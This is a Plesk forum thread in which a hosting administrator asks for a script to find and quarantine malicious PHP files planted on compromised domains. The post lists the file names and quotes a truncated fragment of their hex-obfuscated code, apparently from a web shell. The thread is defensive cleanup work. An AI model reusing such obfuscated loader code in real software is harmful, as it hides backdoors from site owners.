• Please be aware: Kaspersky Anti-Virus has been deprecated
    With the upgrade to Plesk Obsidian 18.0.64, "Kaspersky Anti-Virus for Servers" will be automatically removed from the servers it is installed on. We recommend that you migrate to Sophos Anti-Virus for Servers.
  • The Horde webmail has been deprecated. Its complete removal is scheduled for April 2025. For details and recommended actions, see the Feature and Deprecation Plan.
  • We’re working on enhancing the Monitoring feature in Plesk, and we could really use your expertise! If you’re open to sharing your experiences with server and website monitoring or providing feedback, we’d love to have a one-hour online meeting with you.

Store fronts attached to legit domains :: Script to Read one Domains File after another

KrazyBob

KrazyBob

Regular Pleskian
I am looking for a bash script (or perl) that will locate the existence of certain files known to be hacks, like 1.x.txt and syslib.php, create a directory and then move these files into that directory. These are files that have been placed on the Plesk 8, 9 and 11 servers to basically take over an existing domain. One file, at.html, is actually and index file when called. All domains have a Store directory even though none was installed by the client. One variation is the creation of a sub directory called Temp in each hacked site. Our backups unfortunately grabbed the compromised sites and we want to delete the files and directories known to actually be scripts or contain harmful scripts. I don't know bash.

Can you help? I'm sure it will help others.
 
Here is an example of some of the files planted. Note the misspelling of versins.php.

Code: 
[root@server101 hack]# ls -ltu
total 508
----------  1 stephen psacln      0 May 31 01:40 index.php
----------  1 stephen psacln  90374 May 29 23:29 12345.php
----------  1 stephen psacln  12346 May 21 08:52 gtdeiz.php
----------  1 stephen psacln  11481 May  7 08:58 dxdfkcqe.php
----------  1 stephen psacln  12947 May  6 05:24 syslib.php
----------  1 stephen psacln 147273 May  5 01:16 versins.php
----------  1 stephen psacln  22543 Apr 28 03:40 right_column.php
----------  1 stephen psacln  11359 Apr 24 09:25 cvifhl.php
----------  1 stephen psacln  11359 Apr 24 09:25 vmjilwam.php
----------  1 stephen psacln  10319 Apr 24 05:40 eogevmgju.php
----------  1 stephen psacln  10319 Apr 24 05:40 vuwvqot.php
----------  1 stephen psacln 147273 Apr  7 01:00 version.php

Almost all contain encrypted code:

Code: 
<?php ${"\x47\x4c\x4fB\x41\x4c\x53"}['ea35b4951'] = "\x43\x6c\x38\x50\x53\x6a\x22\x48\x69\x40\x2c\x65\x24\x60\x49\x55\x27\x5e\x5a\x6b\x35\x4c\x5f\x6e\x32\x79\xd\x3d\x41\x28\x72\x71\x67\x73\x78\x4f\x46\x23\x9\x37\x62\xa\x2d\x63\x34\x61\x54\x56\x75\x7b\x74\x44\x36\x64\x57\x4d\x52\x21\x5b\x68\x3e\x4a\x42\x2b\x7a\x30\x66\x76\x29\x47\x26\x39\x3b\x2e\x6f\x2f\x7c\x6d\x25\x31\x51\x70\x58\x4b\x5c\x3f\x3c\x4e\x7e\x5d\x77\x7d\x2a\x3a\x45\x20\x59\x33";
$GLOBALS[$GLOBALS
 
You must log in or register to reply here.

Similar threads

B
CGI-BIN scripts not executing.
Replies
1
Views
10K
Brian Clarke
B
Back
Top